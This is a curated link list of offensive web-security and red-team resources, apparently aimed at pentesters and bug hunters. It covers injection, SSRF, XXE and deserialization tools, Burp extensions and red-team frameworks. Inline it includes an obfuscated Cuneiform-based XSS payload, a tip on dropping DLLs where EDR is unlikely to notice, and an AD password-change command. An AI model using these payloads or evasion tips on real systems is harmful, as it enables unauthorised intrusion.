- [CRLF](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)
- [CRLF Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/C%20InjectionRLF)
- [crlf-injector](https://github.com/rudSarkar/crlf-injector): A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
- [CRLF Bruter](https://github.com/ualvesdias/crlfbruter): A simple tool to test for CRLF injection.
- [CSV-Injection](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md)
- [CSV Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection)
- [Command Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/Command%20Injection)
- [Directory Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal)
- [$4,000 Starbucks secondary context path traversal](https://www.youtube.com/watch?v=sjvW79tjWoM)
- [LFI](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md)
- [kadimus](https://github.com/P0cL4bs/kadimus): kadimus is a tool to check and exploit lfi vulnerability.
- [fimap](https://gitlab.tha-imax.de/root/fimap): is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps.
- [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)
- [Open-Redirect](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md)
- [RCE](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md)
- [Crypto](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md)
- [Template Injection](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md)
- [SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)
- [XSLT](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md)
- [Content Injection](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md)
- [LDAP Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
- [NoSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
- [IDOR](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References)
- [ISCM](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management)
- [OAuth](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth)
- [XPATH Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
- [Bypass Upload Tricky](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files)
- [Web Security CheatSheet](https://blog.p6.is/Web-Security-CheatSheet/)
- [Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.](https://blog.yeswehack.com/yeswerhackers/the-pwning-machine/)
- [Zeus-Scanner](https://github.com/ekultek/zeus-scanner): is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
- SQL Injection:
- [SQL injection](https://portswigger.net/web-security/sql-injection)
- [SQL Injection](https://book.hacktricks.xyz/pentesting-web/sql-injection)
- [Blind SQL injection](https://portswigger.net/web-security/sql-injection/blind)
- [Dangerous Injections](https://levelup.gitconnected.com/an-unwanted-injection-6a5b6bbc4582)
- [Blind SQL Injection at fasteditor.hema.com](https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3)
- [SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack](https://null-byte.wonderhowto.com/how-to/sql-injection-101-fingerprint-databases-perform-general-reconnaissance-for-more-successful-attack-0184562/)
- [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
- [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/#LineComments)
- [The Ultimate SQL Injection Cheat Sheet](https://www.hackingloops.com/sql-injection-cheat-sheet/)
- [Examining the database in SQL injection attacks](https://portswigger.net/web-security/sql-injection/examining-the-database)
- [Dumping a complete database using SQL injection](https://resources.infosecinstitute.com/topic/dumping-a-database-using-sql-injection/)
- [SQLi](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md)
- [SleuthQL](https://rhinosecuritylabs.com/application-security/sleuthql-sql-injection-discovery-tool/): A SQL Injection Discovery Tool
- [Postgres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
- [From SQL Injection to Shell: PostgreSQL edition](https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition/course)
- [Pentesting PostgreSQL with SQL Injections](https://www.onsecurity.io/blog/pentesting-postgresql-with-sql-injections/)
- [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
- [Blind SQL Injection Detection and Exploitation (Cheat Sheet)](https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1)
- SQLMap Cheat Sheet: [1](https://medium.com/hacker-toolbelt/sqlmap-cheat-sheet-e5a38300b50), [2](https://gist.github.com/jkullick/03b98b1e44f03986c5d1fc69c092220d), [3](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet), [4](https://thedarksource.com/sqlmap-cheat-sheet/), [tamper scripts](https://gist.github.com/sapran/a12bd98cf212237ac9678d48f5152941)
- [SQL injection](https://learn.snyk.io/lessons/sql-injection/java/): Improper handling of input during SQL query generation
- CSRF:
- [DNS Hijacking Attacks on Home Routers in Brazil](https://cujo.com/dns-hijacking-attacks-on-home-routers-in-brazil/)
- [CSRF Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection)
- [Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections](https://cobalt.io/blog/bypassing-csrf-tokens-with-pythons-cgihttpserver-to-exploit-sql-injections)
- HTTP Request Smuggling:
- [HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How.](https://twitter.com/sec_r0/status/1427286516196282384/photo/1)
- [Practical Attacks Using HTTP Request Smuggling](https://www.youtube.com/watch?v=3tpnuzFLU8g) [slides](https://drive.google.com/file/d/1iC0972G4meFPGTmqfs8g61qat7ZYLQgf/view)
- [HAProxy HTTP request smuggling](https://nathandavison.com/blog/haproxy-http-request-smuggling) (CVE-2019-18277)
- [The Powerful HTTP Request Smuggling](https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142)
- [Smuggler](https://github.com/amirnsahmad/smuggler): An HTTP Request Smuggling / Desync testing tool written in Python 3
- [HTTP.Request.Smuggling.Desync.Attack](https://github.com/nachiketrathod/HTTP.Request.Smuggling.Desync.Attack): HTTP request smuggling is a technique for interfering with the way of website process the sequences of HTTP requests that are received from one or more users.
- [h2c Smuggling](https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c): Request Smuggling Via HTTP/2 Cleartext (h2c)
- [HTTP Request Smuggler](https://github.com/PortSwigger/http-request-smuggler): This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research.
- [Advanced request smuggling](https://portswigger.net/web-security/request-smuggling/advanced)
- XSS:
- [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
- [Reflected XSS on www.hackerone.com via Wistia embed code](https://hackerone.com/reports/986386)
- [xss cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md)
- [Cross Site Scripting ( XSS ) Vulnerability Payload List](https://github.com/payloadbox/xss-payload-list)
- [an XSS payload, Cuneiform-alphabet based](https://twitter.com/lutfumertceylan/status/1338494979199660032)

```
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```

- [Portable Data exFiltration: XSS for PDFs](https://portswigger.net/research/portable-data-exfiltration) [repo](https://github.com/PortSwigger/portable-data-exfiltration)
- [Find reflected parameters with Burp_Suite](https://twitter.com/m4ll0k/status/1336253067038236673)
- [How to solve a challenge from Intigriti in under 60 minutes](https://medium.com/@terjanq/how-to-solve-a-challenge-from-intigrity-in-under-60-minutes-6843ba9b9552)
- [XSS Hunter](https://xsshunter.com/) allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
- [DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang](https://github.com/hahwul/dalfox)
- CORS:
- [Security impact of a misconfigured CORS implementation](https://www.yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/)
- [Which Security Risks Do CORS Imply?](https://mobilejazz.com/blog/which-security-risks-do-cors-imply/)
- [Cross-Origin Resource Sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)
- [How to win at CORS](https://jakearchibald.com/2021/cors/)
- [CORS'ing a Denial of Service via cache poisoning](https://nathandavison.com/blog/corsing-a-denial-of-service-via-cache-poisoning)
- SSRF:
- [SSRF Search & Destroy](https://raw.githubusercontent.com/hackerscrolls/SecurityTips/master/MindMaps/SSRF.png):
- [SSRF](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md)
- [SSRF Tips](http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html): some tips with Server Side Request Forgery.
- [Server Side Request Forgery on MISP](https://heitorgouvea.me/2020/11/03/CVE-2020-28043): CVE-2020-28043.
- [SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !](https://medium.com/techfenix/ssrf-server-side-request-forgery-worth-4913-my-highest-bounty-ever-7d733bb368cb)
- [Unauthenticated Full-Read SSRF in Grafana](https://rhynorater.github.io/CVE-2020-13379-Write-Up): CVE-2020-13379
- [Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata](https://hackerone.com/reports/530974)
- [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns): GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep
- [Blind SSRF Chains](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/) by [shubs](https://twitter.com/infosec_au/status/1349817057873850368?s=09)
- [lorsrf](https://github.com/knassar702/lorsrf): Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods.
- XXE:
- [Out of Band XXE in an E-commerce IOS app](https://0xgaurang.medium.com/out-of-band-xxe-in-an-e-commerce-ios-app-e22981f7b59b) by [Hack3rScr0lls](https://twitter.com/hackerscrolls/status/1337821232360808453)
- [Comprehensive Guide on XXE Injection](https://www.hackingarticles.in/comprehensive-guide-on-xxe-injection/)
- [XMLDecoder payload generator](https://github.com/mhaskar/XMLDecoder-payload-generator): A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec.
- [Enjoying my first blind xxe experience](https://twitter.com/MrDamanSingh/status/1330822972106444800?s=19)
- [XXE](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md)
- [dtd-finder](https://github.com/GoSecure/dtd-finder): List DTDs and generate XXE payloads using those local DTDs.
- [New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!](https://twitter.com/ptswarm/status/1302966718227189761)
- [XXE_payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
- [Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop/#0)
- [Planilhas Baby](https://bigous.me/write-ups/latinoware2021/planilhasbaby.html), ssrf + ssti + xxe.
- Serialization:
- [ysoserial](https://github.com/frohoff/ysoserial): A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- [SerialVersionUID in Java](https://www.geeksforgeeks.org/serialversionuid-in-java/)
- [Java Serialization Magic Methods And Their Uses With Example](https://www.programmingmitra.com/2019/08/java-serialization-magic-methods-and-their-uses-with-example.html)
- [Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484)](https://medium.com/@romnenko/apache-tomcat-deserialization-of-untrusted-data-rce-cve-2020-9484-afc9a12492c4), [Tomcat code](https://fossies.org/linux/apache-tomcat/java/org/apache/naming/factory/BeanFactory.java): java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
- [CVE-2020-9484-Mass-Scan](https://github.com/osamahamad/CVE-2020-9484-Mass-Scan)
- [Exploiting JNDI Injections in Java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)
- [How to exploit Liferay CVE-2020-7961 : quick journey to PoC](https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html)
- [How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM](https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html)
- [Serialization: the big threat](https://klezvirus.github.io/Advanced-Web-Hacking/Serialisation/)
- [marshalsec](https://github.com/mbechler/marshalsec): Turning your data into code execution
- [SerializationDumper](https://github.com/NickstaDB/SerializationDumper): A tool to dump Java serialization streams in a more human readable form.
- [owaspsd-deserialize-my-shorts](https://github.com/frohoff/owaspsd-deserialize-my-shorts): Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
- [Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities](https://www.sans.org/reading-room/whitepapers/testing/fear-unknown-metanalysis-insecure-object-deserialization-vulnerabilities-39920)
- [Deserialization](https://book.hacktricks.xyz/pentesting-web/deserialization?s=09)
- [FAR SIDES OF JAVA REMOTE PROTOCOLS](https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf)
- [Serialization and deserialization in Java: explaining the Java deserialize vulnerability](https://snyk.io/blog/serialization-and-deserialization-in-java/)
- [Testing and exploiting Java Deserialization in 2021](https://afinepl.medium.com/testing-and-exploiting-java-deserialization-in-2021-e762f3e43ca2)
- [Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities](https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html)
- [GraphQL](https://the-bilal-rizwan.medium.com/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696): Common vulnerabilities & how to exploit them. [apis guru for](https://apis.guru/graphql-voyager/) [graphql](https://github.com/APIs-guru/graphql-voyager):  Represent any GraphQL API as an interactive graph.
- [GraphQL security 101](https://github.com/david3107/graphql-security-labs)
- [How to Insomnia for GraphQL requests](https://markselby9.medium.com/how-to-insomnia-for-graphql-requests-b270e16876a1)
- [InQL Scanner](https://blog.doyensec.com/2020/11/19/inql-scanner-v3.html)
- [Debugging your GraphQL server was never this easy!](https://altair.sirmuel.design/)
- [GraphQL Voyager](https://github.com/APIs-guru/graphql-voyager): 🛰️ Represent any GraphQL API as an interactive graph
- [GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.
- GraphQL:
- [Queries and Mutations](https://graphql.org/learn/queries/)
- [GraphQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection)
- [GraphQL](https://the-bilal-rizwan.medium.com/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696): Common vulnerabilities & how to exploit them. [apis guru for](https://apis.guru/graphql-voyager/) [graphql](https://github.com/APIs-guru/graphql-voyager):  Represent any GraphQL API as an interactive graph.
- [GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): is a scripting engine to interact with a graphql endpoint for pentesting purposes.
- RPC:
- [Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries](https://labs.ioactive.com/2021/07/breaking-protocol-buffers-reverse.html)
- [ProtoFuzz](https://github.com/trailofbits/protofuzz): Google Protocol Buffers message generator
- [pbtk - Reverse engineering Protobuf apps](https://github.com/marin-m/pbtk): A toolset for reverse engineering and fuzzing Protobuf-based apps.
- [Online Protobuf Decoder.](https://protogen.marcgravell.com/decode)
- [Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities](https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html)

- [LazySSTICheck](https://twitter.com/nullenc0de/status/1317195661377503232)
- [CSM_Pocs](https://gist.github.com/magnologan/3d0d24c2d0af7d3f27344fcb14eb8f7e): Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices.
- [DSSS](https://github.com/stamparm/DSSS), Damn Small SQLi Scanner is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
- [Garud](https://github.com/R0X4R/Garud): An automation tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.
- [httpx](https://github.com/projectdiscovery/httpx) is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
- [waybackurls](https://github.com/tomnomnom/waybackurls): Fetch all the URLs that the Wayback Machine knows about for a domain
- [Easily Identify Malicious Servers on the Internet with JARM](https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a?gi=9ff6f4b14c2a)
- [Awesome Electron.js hacking & pentesting resources](https://github.com/doyensec/awesome-electronjs-hacking): A curated list of awesome resources about Electron.js (in)security.
- [Turbo Search](https://github.com/helviojunior/turbosearch): The most powerfull Web Content Scanner
- [Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library](https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/)
- [posta](https://github.com/benso-io/posta): 🐙 Cross-document Messaging security research tool. [Cross document messaging is a very common communication method.](https://twitter.com/naglinagli/status/1366416250373562371)
- [JWT Vulnerabilities (Json Web Tokens)](https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens). [The JSON Web Token Toolkit v2](https://github.com/ticarpi/jwt_tool)
- [Hacking Starbucks and Accessing Nearly 100 Million Customer Records](https://samcurry.net/hacking-starbucks/)
- [Attacking Secondary Contexts in Web Applications](https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8/edit#slide=id.p)
- [OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation](https://infosecwriteups.com/oauth-2-0-hacking-simplified-part-2-vulnerabilities-and-mitigation-d01dd6d5fa2c)
- [Fugu API Tracker](https://fugu-tracker.web.app/): The capabilities project, also known as Project Fugu, is a cross-company effort to make it possible for web apps to do anything iOS, Android, or desktop apps can, by exposing the capabilities of these platforms to the web while maintaining user security, privacy, trust, and other core tenets of the web.
- [XS-Leaks](https://xsleaks.dev/): Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
- [Chrome extension to detect possible xsleaks](https://github.com/1lastBr3ath/XSleaks)
- [Web Finder](https://github.com/helviojunior/webfinder): tool that searchs IP addresses which answers some URL.
- [Flask Unsign](https://github.com/Paradoxis/Flask-Unsign): Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
- [jwt-pwn](https://github.com/mazen160/jwt-pwn): Security Testing Scripts for JWT.

##### Burp Suite

- [Burp Suite Cheat Sheet](https://www.sans.org/security-resources/posters/pen-testing/burp-suite-cheat-sheet-280)
- [Burp Suite Academy](https://www.deepfryd.com/burp-academy-apprentice/)
- REST Assured: Penetration Testing REST APIs Using Burp Suite:
- [Part 1 – Introduction & Configuration](https://www.mindpointgroup.com/blog/pen-test/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration/)
- [Part 2 – Testing](https://www.mindpointgroup.com/blog/pen-test/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-2-testing/)
- [Part 3 – Reporting](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-3-reporting/)
- [Awesome Burp Extensions](https://github.com/snoopysecurity/awesome-burp-extensions): A curated list of amazingly awesome Burp Extensions
- [BurpSuiteHTTPSmuggler](https://github.com/nccgroup/BurpSuiteHTTPSmuggler/): A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
- [AutoRepeater](https://github.com/nccgroup/autorepeater): Automated HTTP Request Repeating With Burp Suite
- [privatecollaborator](https://github.com/putsi/privatecollaborator): A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate
- [Deploying a private Burp Collaborator server](https://portswigger.net/burp/documentation/collaborator/deploying)
- [Burp Collaborator Server docker container with LetsEncrypt certificate](https://github.com/integrity-sa/burpcollaborator-docker): This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server.
- [SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT](https://teamrot.fi/self-hosted-burp-collaborator-with-custom-domain/): The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data.
- [AES-Killer v3.0](https://www.kitploit.com/2018/11/aes-killer-v30-burp-plugin-to-decrypt.html): Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
- [Femida-xss](https://github.com/wish-i-was/femida): Automated blind-xss search for Burp Suite
- [dotNetBeautifier](https://github.com/allfro/dotNetBeautifier): A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
- [Java-Deserialization-Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner): All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller): Burp extension to perform Java Deserialization Attacks.
- [BurpBounty](https://github.com/wagiro/BurpBounty): Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv
- [Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04](https://robert.penz.name/856/howto-install-and-use-the-burp-suite-as-https-proxy-on-ubuntu-14-04/)
- [BurpExtension-WhatsApp-Decryption-CheckPoint](https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint)
- [InQL](https://github.com/doyensec/inql) [Scanner](https://blog.doyensec.com/2020/11/19/inql-scanner-v3.html): A Burp Extension for GraphQL Security Testing.
- [param-miner](https://github.com/PortSwigger/param-miner)
- [PII-Identifier](https://github.com/caioluders/PII-Identifier): Burp Extension to identify PII data
- [403Bypasser](https://github.com/sting8k/BurpSuite_403Bypasser): Burpsuite Extension to bypass 403 restricted directory
- [API testing with Swurg for Burp Suite](https://cornerpirate.com/2020/12/16/api-testing-with-swurg-for-burp-suite/)
- [403Bypasser](https://github.com/sting8k/BurpSuite_403Bypasser)
- Burp Bounty[create a Passive Profile for a param value, like *testsqli* and then create a Rule with this Profile to trigger SQLi active profile.](https://twitter.com/reefbr/status/1349049541425827840?s=19)
- [Handling Short Expiration Time of Authorization Tokens](https://ualvesdias.medium.com/handling-short-expiring-time-of-authorization-tokens-4e7552bdaf1a)
- [BurpSuite-Team-Extension](https://github.com/Static-Flow/BurpSuite-Team-Extension): This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time. Requests that comes through your Burpsuite instance will be replicated in the history of the other testers and vice-versa!
- [ActiveScan++](https://github.com/PortSwigger/active-scan-plus-plus): ActiveScan++ Burp Suite Plugin.

### Red Team

- [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming)
- [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire): "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
- [Machine Learning for Red Teams, Part 1](https://silentbreaksecurity.com/machine-learning-for-red-teams-part-1/)
- [Flying under the radar](https://itsecx.fhstp.ac.at/wp-content/uploads/2018/11/02_Rene_Freingruber_Flying_under_the_radar_freingruber_v1.00.pdf): Hack into a „highly protected“ company without getting caught
- [demiguise](https://github.com/nccgroup/demiguise): HTA encryption tool for RedTeams
- [Sn1per](https://github.com/1N3/Sn1per): Automated pentest framework for offensive security experts
- [jenkins-shell](https://github.com/joesmithjaffa/jenkins-shell): Automating Jenkins Hacking using Shodan API
- [Red Team's SIEM](https://github.com/outflanknl/RedELK): easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- [The-Hacker-Playbook-3-Translation](https://github.com/Snowming04/The-Hacker-Playbook-3-Translation): 对 The Hacker Playbook 3 的翻译。
- [How Do I Prepare to Join a Red Team?](https://medium.com/@redteamwrangler/how-do-i-prepare-to-join-a-red-team-d74ffb5fdbe6)
- [Red Team & Physical Entry Gear](https://scund00r.com/all/gear/2019/06/25/red-team-and-physical-entry-gear.html)
- Red Team Techniques: [Gaining access on an external engagement through spear-phishing](https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/)
- [Phantom Tap (PhanTap)](https://github.com/nccgroup/phantap): an ‘invisible’ network tap aimed at red teams.
- [So You Want to Run a Red Team Operation](https://medium.com/@prsecurity_/how-to-build-an-internal-red-team-7957ec644695): I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization.
- [Alternative C2 for Red Teamers](https://medium.com/@MichaelKoczwara/alternative-c2-for-red-teamers-4ac8b4c3f4fe): [Koadic Command & Control Framework](https://github.com/zerosum0x0/koadic). Koadic C3 COM Command & Control - JScript RAT
- [tunning tip](https://twitter.com/SBousseaden/status/1177131898797211654): if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp\\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
- [In-Memory-Only ELF Execution (Without tmpfs)](https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html): In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).
- [A Red Teamer's guide to pivoting](https://artkond.com/2017/03/23/pivoting-guide/)
- [caldera](https://github.com/mitre/caldera): Automated Adversary Emulation.
- [BankSecurity - Red_Team](https://github.com/BankSecurity/Red_Team): Some scripts useful for red team activities
- [FIN6 Adversary Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/fin6)
- [Red-Teaming-Toolkit](https://github.com/infosecn1nja/Red-Teaming-Toolkit): A collection of open source and commercial tools that aid in red team operations.
- [RedFile](https://github.com/outflanknl/RedFile): A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads
- [Choose Your Own Red Team Adventure](https://medium.com/@malcomvetter/choose-your-own-red-team-adventure-f87d6a3b0b76)
- [Red Tip #415](https://twitter.com/vysecurity/status/1313511859224547334): STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account.
- [Red Team Tactics: Hiding Windows Services](https://www.sans.org/blog/red-team-tactics-hiding-windows-services/)
- [AQUARMOURY](https://github.com/slaeryan/AQUARMOURY): This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
- [Prelude Operator](https://www.prelude.org/): is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming. [repo](https://github.com/preludeorg/community)
- [0xsp Mongoose Red for Windows](https://github.com/lawrenceamer/0xsp-Mongoose): a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.
- [Macrome](https://github.com/michaelweber/Macrome): Excel Macro Document Reader/Writer for Red Teamers & Analysts
- [FireEye Red Team Tool Countermeasures](https://github.com/fireeye/red_team_tool_countermeasures) and [Mandiant SunBurst Countermeasures](https://github.com/fireeye/sunburst_countermeasures).
- [wifipumpkin3](https://github.com/P0cL4bs/wifipumpkin3): Powerful framework for rogue access point attack.
